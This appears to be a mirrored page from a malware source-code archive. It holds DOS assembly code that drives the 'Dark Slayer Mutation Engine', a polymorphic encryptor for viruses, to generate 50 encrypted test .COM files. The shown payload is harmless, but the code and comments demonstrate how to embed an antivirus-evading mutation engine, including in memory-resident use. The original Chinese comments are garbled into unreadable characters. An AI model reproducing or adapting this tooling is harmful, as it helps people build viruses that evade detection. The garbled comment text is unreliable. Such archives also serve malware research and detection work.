mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
119 lines
4.2 KiB
NASM
119 lines
4.2 KiB
NASM
|
|
|||
|
; Dark Slayer Mutation Engine v1.0
|
|||
|
; Written by Dark Slayer in Taiwan
|
|||
|
|
|||
|
DSME_GEN SEGMENT
|
|||
|
ASSUME CS:DSME_GEN,DS:DSME_GEN
|
|||
|
ORG 0100h
|
|||
|
|
|||
|
MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0005h
|
|||
|
|
|||
|
EXTRN DSME:NEAR,DSME_END:NEAR
|
|||
|
|
|||
|
; <20>H<EFBFBD>U<EFBFBD>{<7B><><EFBFBD>A<EFBFBD><41><EFBFBD>F<EFBFBD>n<EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>a<EFBFBD>観<EFBFBD>`<60>ѡA<D1A1>䥦<EFBFBD><E4A5A6><EFBFBD><EFBFBD><EFBFBD>ۤv<DBA4><76><EFBFBD>s
|
|||
|
; you may get some information as following remarks
|
|||
|
;
|
|||
|
|
|||
|
START:
|
|||
|
MOV AH,09h
|
|||
|
MOV DX,OFFSET DG_MSG
|
|||
|
INT 21h
|
|||
|
|
|||
|
MOV AX,OFFSET DSME_END+000Fh ; <20><><EFBFBD>{<7B><> + DSME+000Fh <20><><EFBFBD>᪺<EFBFBD><E1AABA><EFBFBD>}
|
|||
|
; <20>Y<EFBFBD><59> 0100h <20>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>{<7B><> + DSME <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; This program + DSME+000Fh address
|
|||
|
; Minus 0100h = this program + DSME
|
|||
|
; lengh
|
|||
|
MOV CL,04h
|
|||
|
SHR AX,CL
|
|||
|
MOV BX,CS
|
|||
|
ADD BX,AX
|
|||
|
|
|||
|
MOV ES,BX ; <20>] ES <20>Ψө<CEA8><D3A9>ѽX<D1BD>{<7B><><EFBFBD>M<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD>
|
|||
|
; <20>ѽX<D1BD>{<7B><><EFBFBD>̤j<CCA4><6A> 1024 Bytes
|
|||
|
; <20>Y<EFBFBD>Φb<CEA6>`<60>n<EFBFBD>{<7B><><EFBFBD>ɡA<C9A1>h<EFBFBD><68><EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>t<EFBFBD><74><EFBFBD>O<EFBFBD><4F><EFBFBD><EFBFBD><EFBFBD>j<EFBFBD>p
|
|||
|
; Setting ES to put decryptor and encrypted
|
|||
|
; code.
|
|||
|
; Decryptor maxium is 1024 bytes
|
|||
|
; You should notice the allocation of memory
|
|||
|
; size when you use DSME in resident mode.
|
|||
|
|
|||
|
|
|||
|
MOV CX,50
|
|||
|
DG_L0:
|
|||
|
PUSH CX
|
|||
|
MOV AH,3Ch
|
|||
|
XOR CX,CX
|
|||
|
MOV DX,OFFSET FILE_NAME
|
|||
|
INT 21h
|
|||
|
XCHG BX,AX
|
|||
|
|
|||
|
MOV BP,0100h ; <20>ѽX<D1BD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}
|
|||
|
; <20>ΨӼg<D3BC>r<EFBFBD>ɫh<C9AB>̱<EFBFBD><CCB1>P<EFBFBD>V<EFBFBD>ɮפ<C9AE><D7A4>j<EFBFBD>p<EFBFBD>ӳ]
|
|||
|
; Offset where the decryption routine
|
|||
|
; will be executed
|
|||
|
; It depends on which kinds of files
|
|||
|
; COM or EXE?
|
|||
|
|
|||
|
MOV CX,OFFSET PROC_END-OFFSET PROC_START ; <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; encrypted code
|
|||
|
; lengh
|
|||
|
|
|||
|
MOV DX,OFFSET PROC_START ; DS:DX -> <20>n<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD>}
|
|||
|
; DS:DX -> Encrypted code's
|
|||
|
; address
|
|||
|
|
|||
|
PUSH BX ; <20>O<EFBFBD>s File handle
|
|||
|
; keep File handle
|
|||
|
|
|||
|
MOV BL,00h ; COM <20>Ҧ<EFBFBD>
|
|||
|
; COM mode
|
|||
|
|
|||
|
CALL DSME
|
|||
|
|
|||
|
POP BX
|
|||
|
|
|||
|
MOV AH,40h ; <20><><EFBFBD>^<5E><> DS:DX = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}
|
|||
|
INT 21h ; CX = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>סA<D7A1>䥦<EFBFBD>Ȧs<C8A6><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; When returning from DSME,
|
|||
|
; DS:DX = decryptor + encrypted code's address
|
|||
|
; CX = lengh of decryptor + encrypted code
|
|||
|
; Other registers won't be changed.
|
|||
|
|
|||
|
MOV AH,3Eh
|
|||
|
INT 21h
|
|||
|
|
|||
|
PUSH CS
|
|||
|
POP DS ; <20>N DS <20>]<5D>^<5E><>
|
|||
|
; restore DS
|
|||
|
|
|||
|
MOV BX,OFFSET FILE_NUM
|
|||
|
INC BYTE PTR DS:[BX+0001h]
|
|||
|
CMP BYTE PTR DS:[BX+0001h],'9'
|
|||
|
JBE DG_L1
|
|||
|
INC BYTE PTR DS:[BX]
|
|||
|
MOV BYTE PTR DS:[BX+0001h],'0'
|
|||
|
DG_L1:
|
|||
|
POP CX
|
|||
|
LOOP DG_L0
|
|||
|
MOV AH,4Ch
|
|||
|
INT 21h
|
|||
|
|
|||
|
FILE_NAME DB '000000'
|
|||
|
FILE_NUM DB '00.COM',00h
|
|||
|
|
|||
|
DG_MSG DB 'Generates 50 DSME encrypted test files.',0Dh,0Ah,'$'
|
|||
|
|
|||
|
PROC_START:
|
|||
|
MOV AH,09h
|
|||
|
CALL $+0003h
|
|||
|
POP DX
|
|||
|
ADD DX,MSG_ADDR
|
|||
|
INT 21h
|
|||
|
INT 20h
|
|||
|
MSG DB 'this is <DSME> test file.$'
|
|||
|
PROC_END:
|
|||
|
|
|||
|
DSME_GEN ENDS
|
|||
|
END START
|
|||
|
|